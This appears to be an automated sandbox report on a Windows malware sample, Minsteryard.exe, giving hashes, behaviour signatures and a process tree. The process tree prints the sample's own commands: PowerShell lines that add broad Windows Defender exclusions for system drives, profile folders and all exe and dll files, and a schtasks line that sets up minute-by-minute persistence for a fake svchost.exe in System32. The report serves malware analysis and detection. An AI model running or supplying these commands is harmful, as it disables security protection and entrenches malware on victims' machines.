Analysis
-
max time kernel
149s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
11-01-2025 03:40
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_f600d5e0f9a95a876b9887dd00fc6632.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
JaffaCakes118_f600d5e0f9a95a876b9887dd00fc6632.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$TEMP/Minsteryard.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
$TEMP/Minsteryard.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$TEMP/fYxbPKoziOFe.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
$TEMP/fYxbPKoziOFe.exe
Resource
win10v2004-20241007-en
General
-
Target
$TEMP/Minsteryard.exe
-
Size
3.7MB
-
MD5
1ad3029c8d2a4757628b99efc75a87ef
-
SHA1
3a6164f653bc11c303c98716764c443fe651b6e8
-
SHA256
9b7b1e2944d31e405a7d72a08ecf193f509ff52e5670f6813be986ac9ff65ecc
-
SHA512
f097481515d99e7ddf11fbd09c004c5286e3857fb1fb2c9305a4e491611690f4cf61303654802545a9259762fc1ba18845185ac651d06cdbf83db19133cf0bbe
-
SSDEEP
98304:beGWFH8Yi0OaTH238L6O2vteL8vxzxBe7SIMg+W:OcV0OE238GOZLK3JNg+W
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2708 powershell.exe 2952 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 560 svchost.exe 2104 svchost.exe -
Loads dropped DLL 1 IoCs
pid Process 2684 taskeng.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\WindowsPro\svchost.exe Minsteryard.exe File created C:\Windows\system32\WindowsPro\svchost.exe Minsteryard.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2692 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2248 Minsteryard.exe 2708 powershell.exe 2952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2248 Minsteryard.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 560 svchost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2248 wrote to memory of 2648 2248 Minsteryard.exe 30 PID 2248 wrote to memory of 2648 2248 Minsteryard.exe 30 PID 2248 wrote to memory of 2648 2248 Minsteryard.exe 30 PID 2248 wrote to memory of 2692 2248 Minsteryard.exe 32 PID 2248 wrote to memory of 2692 2248 Minsteryard.exe 32 PID 2248 wrote to memory of 2692 2248 Minsteryard.exe 32 PID 2648 wrote to memory of 2708 2648 cmd.exe 33 PID 2648 wrote to memory of 2708 2648 cmd.exe 33 PID 2648 wrote to memory of 2708 2648 cmd.exe 33 PID 2648 wrote to memory of 2952 2648 cmd.exe 35 PID 2648 wrote to memory of 2952 2648 cmd.exe 35 PID 2648 wrote to memory of 2952 2648 cmd.exe 35 PID 2684 wrote to memory of 560 2684 taskeng.exe 37 PID 2684 wrote to memory of 560 2684 taskeng.exe 37 PID 2684 wrote to memory of 560 2684 taskeng.exe 37 PID 2684 wrote to memory of 2104 2684 taskeng.exe 38 PID 2684 wrote to memory of 2104 2684 taskeng.exe 38 PID 2684 wrote to memory of 2104 2684 taskeng.exe 38 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\$TEMP\Minsteryard.exe"C:\Users\Admin\AppData\Local\Temp\$TEMP\Minsteryard.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\cmd.exe"cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Panaesthesia" /tr "C:\Windows\system32\WindowsPro\svchost.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2692
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {54F5F3B3-D92F-4F1C-BC18-7F9A902070E4} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
PID:2104
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fa8f4ca6904b6da8e179606fce30c75a
SHA1688fc1f20f3713e4df3b7ccb83ad18b5b69858f2
SHA25614255942d8b2221c4203ebddfc11923181f956d5f079cd55960049267cea83b6
SHA512ae95e72d18d3aa28cd73ee945cbbc0a44a94116d40c399a0ec48b79ac20ca2079d9f97c8fd26e944b52e105484e7e9665f27ae56cbb59677831ffcbb46f9d51a
-
Filesize
10.9MB
MD59b6076c34aacb461a85cf33b2bb0a7f8
SHA1fc0dd560f497084a0ac5be880d7c648b06e0a069
SHA256f69efe5c8be9546d026bfa22564113c57b09987bae3d7a6bba54324c41a368d8
SHA5123df12375c12ed0d48c09884b76122cc4de59eefa6302424f1798d6fee35033d12096c4540cfcf20d4702afe07e1cdf273638fa977571c2c447105bee437b6fba